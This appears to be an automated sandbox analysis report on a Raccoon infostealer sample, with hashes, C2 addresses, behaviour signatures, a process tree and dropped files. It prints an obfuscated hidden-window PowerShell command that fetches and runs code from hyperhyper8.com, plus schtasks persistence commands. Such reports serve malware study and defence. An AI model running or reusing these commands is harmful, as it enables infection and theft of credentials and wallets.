raccoon | ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8

Analysis

max time kernel
116s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2022 09:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe
Size

1.8MB
MD5

6dbedbc7004b82e9350e6a27cbe0684a
SHA1

ade3b72837acc0f94f21cdee9e81df66b58f2e1b
SHA256

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8
SHA512

751d8e4098aa7edd0945460b0d202ffef36a1de5a435ab4ffeed4345b19fd6dbbf20d48cdcd6d452c2692ad0a777629d84f71e249fb0b1347d933fcfe289e80a

Score

10^/10

raccoon c4376f037b1703b305ca5fb81f6ffc21 spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://hyperhyper8.com/welcome

Extracted

Family

raccoon

Botnet

c4376f037b1703b305ca5fb81f6ffc21

http://74.119.192.73/

http://77.75.230.84/

rc4.plain

Signatures

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1420-155-0x0000000000000000-mapping.dmp	family_raccoon
behavioral2/memory/1420-156-0x0000000000820000-0x0000000000831000-memory.dmp	family_raccoon
behavioral2/memory/1420-159-0x0000000000820000-0x0000000000831000-memory.dmp	family_raccoon
behavioral2/memory/1420-160-0x0000000000820000-0x0000000000831000-memory.dmp	family_raccoon
behavioral2/memory/1420-178-0x0000000000820000-0x0000000000831000-memory.dmp	family_raccoon

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

72 2776 powershell.exe
Downloads MZ/PE file

flow	pid	process
72	2776	powershell.exe

Executes dropped EXE 4 IoCs

Processes:

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmpca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmpO1AnzH0RR.exeyv9d94eq.exe

pid	process
4904	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
2700	O1AnzH0RR.exe
1124	yv9d94eq.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp

Loads dropped DLL 5 IoCs

Processes:

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmpca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmpexplorer.exe

pid	process
4904	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
1420	explorer.exe
1420	explorer.exe
1420	explorer.exe

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 130.61.117.123
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

yv9d94eq.exe

pid process

1124 yv9d94eq.exe
1124 yv9d94eq.exe

description	ioc
Destination IP	130.61.117.123

pid	process
1124	yv9d94eq.exe
1124	yv9d94eq.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmpO1AnzH0RR.exe

description	pid	process	target process
PID 1480 set thread context of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 2700 set thread context of 1420	2700	O1AnzH0RR.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	process	target process
3536	1480	WerFault.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
2272	1124	WerFault.exe	yv9d94eq.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

308 schtasks.exe
3216 schtasks.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

explorer.exepowershell.exeyv9d94eq.exe

pid process

1668 explorer.exe
1668 explorer.exe
1668 explorer.exe
1668 explorer.exe
2776 powershell.exe
2776 powershell.exe
1124 yv9d94eq.exe
1124 yv9d94eq.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2776 powershell.exe

pid	process
308	schtasks.exe
3216	schtasks.exe

pid	process
1668	explorer.exe
1668	explorer.exe
1668	explorer.exe
1668	explorer.exe
2776	powershell.exe
2776	powershell.exe
1124	yv9d94eq.exe
1124	yv9d94eq.exe

description	pid	process
Token: SeDebugPrivilege	2776	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.execa1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmpca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.execa1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp

description	pid	process	target process
PID 2144 wrote to memory of 4904	2144	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
PID 2144 wrote to memory of 4904	2144	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
PID 2144 wrote to memory of 4904	2144	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
PID 4904 wrote to memory of 1848	4904	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe
PID 4904 wrote to memory of 1848	4904	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe
PID 4904 wrote to memory of 1848	4904	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe
PID 1848 wrote to memory of 1480	1848	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
PID 1848 wrote to memory of 1480	1848	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
PID 1848 wrote to memory of 1480	1848	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe
PID 1480 wrote to memory of 1668	1480	ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp	explorer.exe

C:\Users\Admin\AppData\Local\Temp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe
"C:\Users\Admin\AppData\Local\Temp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2144

C:\Users\Admin\AppData\Local\Temp\is-5ODVI.tmp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5ODVI.tmp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp" /SL5="$E0120,1066731,832512,C:\Users\Admin\AppData\Local\Temp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4904

C:\Users\Admin\AppData\Local\Temp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe
"C:\Users\Admin\AppData\Local\Temp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe" /VERYSILENT
3⤵
- Suspicious use of WriteProcessMemory
PID:1848

C:\Users\Admin\AppData\Local\Temp\is-LI6VR.tmp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LI6VR.tmp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp" /SL5="$A004E,1066731,832512,C:\Users\Admin\AppData\Local\Temp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\SysWOW64\explorer.exe
explorer.exe 92
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1668

C:\Users\Admin\AppData\Local\Temp\O1AnzH0RR.exe
"C:\Users\Admin\AppData\Local\Temp\O1AnzH0RR.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2700

C:\Windows\SysWOW64\explorer.exe
explorer.exe
7⤵
- Loads dropped DLL
PID:1420

C:\Users\Admin\AppData\Roaming\yv9d94eq.exe
"C:\Users\Admin\AppData\Roaming\yv9d94eq.exe"
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1124

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 5 /tn "PerformanceMonitor_{Y6F7A6L1Q3V2W4S7}" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\PerfMon\PerfWatson2.exe"
9⤵
- Creates scheduled task(s)
PID:308

C:\Windows\SysWOW64\schtasks.exe
/C /Query /XML /TN "PerformanceMonitor_{Y6F7A6L1Q3V2W4S7}"
9⤵
PID:1564

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /tn "PerformanceMonitor_{Y6F7A6L1Q3V2W4S7}" /XML "C:\Users\Admin\AppData\Roaming\Microsoft\PerfMon\1201824912038.xml"
9⤵
- Creates scheduled task(s)
PID:3216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 508
9⤵
- Program crash
PID:2272

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//hyperhyper8.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
6⤵
PID:1704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//hyperhyper8.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 396
5⤵
- Program crash
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1480 -ip 1480
1⤵
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1124 -ip 1124
1⤵
PID:4020

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
C:\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
C:\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\O1AnzH0RR.exe
Filesize
85KB

MD5
470b380ce45eab609237affe194029e2

SHA1
6100045d09b0e9e8bfe557540534f4b8779a15e0

SHA256
f1e3a3640cf76b2d0dc8db0b2d37f635db3177a55072cd0c34eda97c493e2c82

SHA512
f255da29a731502f36c5dd715ecae8d5448e975b1320ad5caa10909d4db8473b266e48a227808a119e06a0f81670d351675d938e8094bcc286fe2dc49ff1748a

Download Submit
C:\Users\Admin\AppData\Local\Temp\O1AnzH0RR.exe
Filesize
85KB

MD5
470b380ce45eab609237affe194029e2

SHA1
6100045d09b0e9e8bfe557540534f4b8779a15e0

SHA256
f1e3a3640cf76b2d0dc8db0b2d37f635db3177a55072cd0c34eda97c493e2c82

SHA512
f255da29a731502f36c5dd715ecae8d5448e975b1320ad5caa10909d4db8473b266e48a227808a119e06a0f81670d351675d938e8094bcc286fe2dc49ff1748a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1A4O9.tmp\service.dll
Filesize
321KB

MD5
0b8e974c670b08a6f08960f9d25d178d

SHA1
b5d1a6f3db338d3bb8aae1dfc9a45b449d397bf0

SHA256
cade7a06c16dcede9767e374a2908c5f1d26c80e3a50e41347c9cf3d2d9c4df3

SHA512
4c7ece0ef4eac39c198e52f36fedbf7d567a192d97d0740f9d042b9e947465cc728158677edc5dd9ba2f5df8c87e15264b2e4a6966ee79b116f68b2b949f228f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5ODVI.tmp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
Filesize
3.0MB

MD5
d419f705c8346b8a2d6eb6d93806e7ab

SHA1
d36ab8624f3290da188596f305ca77f7f30f7853

SHA256
3f6c117df50989240c303681c156841d4a283639f9fe521b775199ec5dda56c0

SHA512
dcdaa4b0c9e5f5a46541544b2a13d9b1a2074da904e52885f2255d53ec644f2b1daedaaab67e279a6a1a7198bffbc869874f6b9858a98cd542b34f9b05c13b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LI6VR.tmp\ca1703fdb5251f1c5a8e1de0ba134ba2c4992f3ecf92f0e3518efee2bdf986a8.tmp
Filesize
3.0MB

MD5
d419f705c8346b8a2d6eb6d93806e7ab

SHA1
d36ab8624f3290da188596f305ca77f7f30f7853

SHA256
3f6c117df50989240c303681c156841d4a283639f9fe521b775199ec5dda56c0

SHA512
dcdaa4b0c9e5f5a46541544b2a13d9b1a2074da904e52885f2255d53ec644f2b1daedaaab67e279a6a1a7198bffbc869874f6b9858a98cd542b34f9b05c13b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-T595T.tmp\service.dll
Filesize
321KB

MD5
0b8e974c670b08a6f08960f9d25d178d

SHA1
b5d1a6f3db338d3bb8aae1dfc9a45b449d397bf0

SHA256
cade7a06c16dcede9767e374a2908c5f1d26c80e3a50e41347c9cf3d2d9c4df3

SHA512
4c7ece0ef4eac39c198e52f36fedbf7d567a192d97d0740f9d042b9e947465cc728158677edc5dd9ba2f5df8c87e15264b2e4a6966ee79b116f68b2b949f228f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\PerfMon\1201824912038.xml
Filesize
1KB

MD5
04925c6841b9576372d0c915493f10d0

SHA1
89ff4a4b1dd17547c6914673539cb112dff83b1d

SHA256
56b14c9836338a7a77c7743da0aafab4bc015d0161b1b98e1504f60a2f1648c5

SHA512
aca7947146c997157e5a7f5eda0b015f19adcc1dfcdecfc47c5324c868010e04c903a16c9807a7615e8a483005d37b451a74e45976e9f43a821c4dbc5650b3da

Download Submit
C:\Users\Admin\AppData\Roaming\yv9d94eq.exe
Filesize
6.6MB

MD5
92048033521de909bfcc1303491f79ae

SHA1
85d2f6359c261738e1a7eefa2bcb1ed79731526f

SHA256
fb06c50d3ed42509fb7bb4065e93e2f23c2b4c8b99f640bbce9123459183437e

SHA512
a10704d9f3ca5ef62884d5820f4fceebae4c0dacaac9486a7faafc90c03a7eb52caa169f1a9786186e78f91cc7ad86ede3c7c645c570b1feb6343820b0386a76

Download Submit
C:\Users\Admin\AppData\Roaming\yv9d94eq.exe
Filesize
6.6MB

MD5
92048033521de909bfcc1303491f79ae

SHA1
85d2f6359c261738e1a7eefa2bcb1ed79731526f

SHA256
fb06c50d3ed42509fb7bb4065e93e2f23c2b4c8b99f640bbce9123459183437e

SHA512
a10704d9f3ca5ef62884d5820f4fceebae4c0dacaac9486a7faafc90c03a7eb52caa169f1a9786186e78f91cc7ad86ede3c7c645c570b1feb6343820b0386a76

Download Submit
memory/308-183-0x0000000000000000-mapping.dmp

Download
memory/1124-182-0x0000000000430000-0x0000000000E66000-memory.dmp

Filesize
10.2MB

Download
memory/1124-187-0x0000000000430000-0x0000000000E66000-memory.dmp

Filesize
10.2MB

Download
memory/1124-179-0x0000000000000000-mapping.dmp

Download
memory/1420-178-0x0000000000820000-0x0000000000831000-memory.dmp

Filesize
68KB

Download
memory/1420-160-0x0000000000820000-0x0000000000831000-memory.dmp

Filesize
68KB

Download
memory/1420-156-0x0000000000820000-0x0000000000831000-memory.dmp

Filesize
68KB

Download
memory/1420-159-0x0000000000820000-0x0000000000831000-memory.dmp

Filesize
68KB

Download
memory/1420-155-0x0000000000000000-mapping.dmp

Download
memory/1480-148-0x0000000003490000-0x00000000034CB000-memory.dmp

Filesize
236KB

Download
memory/1480-140-0x0000000000000000-mapping.dmp

Download
memory/1564-184-0x0000000000000000-mapping.dmp

Download
